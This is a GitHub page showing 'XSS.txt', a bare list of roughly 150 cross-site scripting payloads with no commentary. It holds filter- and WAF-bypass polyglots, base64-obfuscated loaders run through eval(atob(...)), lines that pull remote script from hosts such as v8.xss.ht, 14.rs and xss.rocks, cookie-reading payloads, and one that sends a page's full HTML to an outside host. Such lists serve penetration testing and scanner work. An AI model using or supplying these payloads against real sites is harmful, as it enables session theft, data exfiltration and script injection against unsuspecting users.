-
Notifications
You must be signed in to change notification settings - Fork 3
/
XSS.txt
150 lines (148 loc) · 9.66 KB
/
XSS.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
<sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--</Title/</Style/</Script/</textArea/</iFrame>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\x55.is/.source))}//\76-->
1'"<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
1'<A/Href="//X55.is/><Base/K='0
<svg><use><set attributeName="href" to="data:image/svg+xml,<svg id='x' xmlns="http://www.w3.org/2000/svg"><image href='1' onerror='alert(1)' /></svg>#x" />
<Base Href=//X55.is>
"<!--><Svg OnLoad=(confirm)(1)<!--
JavaScript://%250Dtop.confirm?.(1)//
1'"><!--><Base Href=//X55.is?
1'-top['con\146irm'](1)-'
/confirm(1)?.(1)//\
["');alert('XSS');//"]@xyz.xxx
'"><Svg OnLoad=alert(1)> '"1='
<a/href="/alert(1)/">
<a/href="/prompt(1)/"<
<img/src="/prompt(1)/"<
<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
<select><noembed></select><script x='a@b'a>
y='a@b'//a@b%0a\u0061lert(1)</script x>
<d3v/onauxclick=(((alert)))``>click
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ+cHJvbXB0KDEpPC9zY3JpcHQ+"
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<a/href=prompt(1)
 <
<svg/onload=prompt(1) <
'"><svg/onload=write(1)>
"><A%0aoNMOusEoVER%09=%09(prompt(document.domain,document.cookie))``%0dx>
%27"><a%20oNMOusEoVER=(prompt(document.domain,document.cookie))>AAA
<img src=1 onerror=prompt(1)
 <
<details/open/ontoggle=write(1) <
<details/open/ontoggle=write(1)//
<brinhosa onclick=confirm()>click
<brinhosa/="/prompt(1)/"<
"autofocus ' onfocus='alert(document.domain)'
"autofocus onfocus='alert(document.domain)'
"test ' ontest='a'
<svg onload=write(7)>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
<img/src="x"/onerror=prompt(1)
 <
<svg/onload=prompt(1)
 <
<svg/onload=javascript:alert(1) <
<svg onload=javascript:alert('XSS')>
<details/open/ontoggle=console.log(7*7)//
<Svg%20One%20OnLoad=alert\(1\)\>
'"<Svg%20One%20OnLoad=confirm\(1\)\>
--!><Svg/Onload=confirm`cookie`>
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`akamaibypass`;>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<img src=x onerror="javascript:alert('XSS')">
<img/src="x"/onerror="prompt(7*7)">
<img src="x" onerror="console.log(7*7)">
javascript:prompt(1)
javascri%0dpt:prompt()
[SPASI]javascript:prompt()
<svg/onload=alert()>
<script/src=//⑮.rs
<x/oncut=alert(1)>a
<iframe src=//⑮.rs>
'"<x/oncut=alert(1)>a
"<script src=//14.rs>"
');%0a}%0d}%09alert();/*anything here*/if(true){//anything here%0a('
<a"/onclick=(confirm)()>click
<a/href=javascript:alert()>click
<a/href=Java%0a%0d%09script:alert()>click
<d3v/onauxclick=[2].some(confirm)>click
<d3v/onauxclick=(((confirm)))``>click
<d3v/onmouseleave=[2].some(confirm)>click
<details/open/ontoggle=alert()>
<details/open/ontoggle=(confirm)()//
{{'tester'.constructor.prototype.charAt=[].join;$eval('test=test} } };alert(document.domain)//');}}
'-setTimeout`prompt\u0028document.domain\u0029`-'
-setTimeout`prompt\u0028document.domain\u0029`-
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
<svg/onload="(new Image()).src='//v8.xss.ht/'%2Bdocument.documentElement.innerHTML">
onload=alert(document.domain)
javascript:"/*'/*`/*--><html \" onmouseover=/*<svg/*/onload=alert()//>
"'><img src=x onerror=alert(1)>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
"><script src=https://v8.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://v8.xss.ht\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdjgueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdjgueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdjgueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://v8.xss.ht";parent.document.body.appendChild(a);</script>">
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//v8.xss.ht");a.send();</script>
<script>$.getScript("//v8.xss.ht")</script>
"></script><script>alert(document.cookie)</script>
"><image/src="//
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
#'><img src=x onerror=alert(document.domain)>
%22%27%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E
%22%3E%3Cimage/src=%22//
%23%27%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E
%2522%253E%253Cimage%2Fsrc%3D%2522%2F%2F
%2527%253E%253Cscript%253Ealert%28document%2Edomain%29%253C%2Fscript%253E
%27%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
%2D%2D%3E%3Cbutton%2Fautofocus%2Fonfocus%3DFunction%28%22confirm%601%60%22%29%28%29%3B%2F%2Fname%3D%22XSS
%3C%2Fscript%3E%3Cscript%3Eakert%281%29%3C%2Fscript%3E
%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%29%3E
%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E
'><script>alert(document.domain)</script>
--><button/autofocus/onfocus=Function("confirm`1`")();//name="XSS
1234%3Cimg%2Bsrc%2Bonerror%253d%27alert%281%29%27%3E
1234<img src onerror='alert(1)'>
1234<img+src+onerror%3d'alert(1)'>
</script><script>alert(1)</script>
</script><svg/onload=alert()>
<script>alert(document.cookie)</script>
FA%5FCERT%2527%2520onmouseover%3Dalert%281%29%2520%2527%2522%26
FA_CERT%27%20onmouseover=alert(1)%20%27%22&
FA_CERT' onmouseover=alert(1) '"&
Test <img src=x onerror=alert(2)>
Test%20%3Cimg%20src%3Dx%20onerror%3Dalert%282%29%3E
ayn%253C%2Fscript%253E%253Csvg%2Fonload%3Dalert%28document%252edomain%29%253E
ayn%3C/script%3E%3Csvg/onload=alert(document%2edomain)%3E
ayn</script><svg/onload=alert(document.domain)>
<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
<style amp-custom>[id='</st\000079le></head><body> <img src=https://bla.com/xx.jpg onerror=a=1>']{color:blue}</style>